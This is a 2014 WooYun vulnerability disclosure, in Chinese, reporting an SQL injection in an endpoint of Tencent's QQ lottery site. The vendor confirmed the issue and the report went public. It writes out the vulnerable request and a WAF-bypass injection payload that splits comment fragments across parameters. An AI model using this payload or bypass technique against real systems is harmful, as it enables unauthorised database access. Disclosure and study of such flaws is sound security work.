当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069416

漏洞标题:腾讯QQ彩票某处SQL注射

相关厂商:腾讯

漏洞作者: Jannock

提交时间:2014-07-23 15:45

修复时间:2014-09-06 15:46

公开时间:2014-09-06 15:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-23: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-06: 细节向公众公开

简要描述:

腾讯的waf越来越利害了,手中几个注入都成了鸡肋。刚好发现腾讯QQ彩票某处SQL注射,此注入点存在两种方式绕过waf。

详细说明:

注入地址:

POST /my/index.php?mod=securityinfo&op=AjaxUpdateTipsSet HTTP/1.1
Host: 888.sports.qq.com
typ=kjhm&kjhm_ssq=1&kjhm_dlt=0&kjhm_fc3d=0&kjhm_pl3=0&kjhm_pl5=0&kjhm_qlc=0&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0


除了 typ 参数外,其它参数都存在SQL注入
猜是 update 型 注入
像 update table set kjhm_ssq=1,kjhm_dlt=0 ...... where uid=xxxxx
由于这里太多参数,所以可以结合多参数方式绕过waf拦截
方式1:

typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=1),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=2),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*


根据参数顺序不同来绕过。有多种组合来实现过滤拦截。
由于大部分工具不支持,那么我们来第二种。
方式2:
参考: WooYun: 腾讯某分站一个比较有意思的SQL注射漏洞
继续可用。。

漏洞证明:

11.jpg

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-07-28 09:27

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无